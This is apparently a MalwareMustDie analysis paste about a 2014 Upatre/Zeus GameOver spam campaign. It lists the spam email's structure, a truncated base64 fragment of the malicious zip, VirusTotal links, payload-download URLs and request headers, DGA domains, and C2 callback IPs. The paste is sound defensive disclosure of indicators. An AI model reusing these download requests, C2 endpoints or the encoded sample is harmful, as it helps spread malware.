// #MalwareMustDie | @unixfreaxjp /malware/checkdomains]$ date
// Thu Mar 27 02:21:55 JST 2014
// UPATRE ZZP of ZGMO campaign via Spam attachment
// Project homebase: http://blog.malwaremustdie.org/2014/03/a-post-to-sting-zeus-p2pgameover-crooks.html
// Spambot template: type Cutwail (base64) version
// pic: https://lh6.googleusercontent.com/-VGE48Iutl5A/UzML27nroNI/AAAAAAAAPN8/UH1tP1YHv_o/s529/001.png
------=_Part_63352_2507082818.5786714685312
Content-Type: text/plain; charset=windows-1251; format=flowed
Content-Transfer-Encoding: 7bit
Message:
Number of Images: 1
Attachment File Type: PDF
// Boundary in (base64!!!)
------=_Part_63352_2507082818.5786714685312
Content-Type: application/zip;
name="Scan_001.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
name="Scan_001.zip"
UEsDBBQAAAAIAGA6eURlvioWSxwAAABKAAAMAAAAU2Nhbl8wMDEuZXhl7VwJXBTH0u8BFBQE
jxlNPEcF8QQWGEBRXC4PIgbEaBKCzALLkYeAwHok4hGPREefmEONLwooRk00KhGDR3RGFBRF
// Virus Total Check/Links:
Upatre (spam zip) https://www.virustotal.com/en/file/a3f1a5587129c9101808ff40421186f56fc32acbf2127cdeb54a8fb290907452/analysis/
Upatre (polymorph drop) https://www.virustotal.com/en/file/0a86782adae8a372823abb2293232657161eae5bae6243eea685545e0e5f7448/analysis/1395853555/
ZGMO (Downloaded/encoded) https://www.virustotal.com/en/file/e85446688c08dd62bb17a21255fe486eb2fb8ca4acc2e4ae974e31a4ad9dfbe0/analysis/1395853489/
ZGMO (Polymorph drop) https://www.virustotal.com/en/file/885d3f004200fcd507c0264f88746ee3f5a7a0e5c42f5b5512d6e5e80cc718c2/analysis/1395853466/
Rootkit (Necurs) https://www.virustotal.com/en/file/f1473d776bca32df38f449b5e4e82bdc58825aabf5b5ab03f02e0b3caaf2a661/analysis/
// Spambot source:
Received: from unknown (HELO ovh.fr) (109.190.52.100)
by xx.xx.xx with SMTP; 26 Mar 2014 02:37:19 +0900
// Downloads ZGMO from: 91.235.171.231
URL: h00p://pazisnimase.com//wp-content/uploads/2014/03/TARGT.tis
// UPATRE GET HEADER:
GET /wp-content/uploads/2014/03/TARGT.tis HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: pazisnimase.com
Cache-Control: no-cache
// Zeus GMO LAME DGA Callback:
// Zeus GMO DGA ALIVE:
aulbbiwslxpvvphxnjij.biz,50.116.4.71,DNS1-5.REGISTRAR-SERVERS.COM
qkdapcqinizsczxrwaelaimznfbqq.biz,178.79.178.243,DNS1.NAMESECURE.COM
// Zeus GMO CNC Callbacks
CNC Callback 1 to 50.116.4.71
CNC Callback 2 to 178.79.178.243
// CNC Callback Header:
POST /write HTTP/1.1
Host: default
Accept-Encoding:
Connection: close
Content-Length: 326
X-ID: 5555
---
#MalwareMustdie!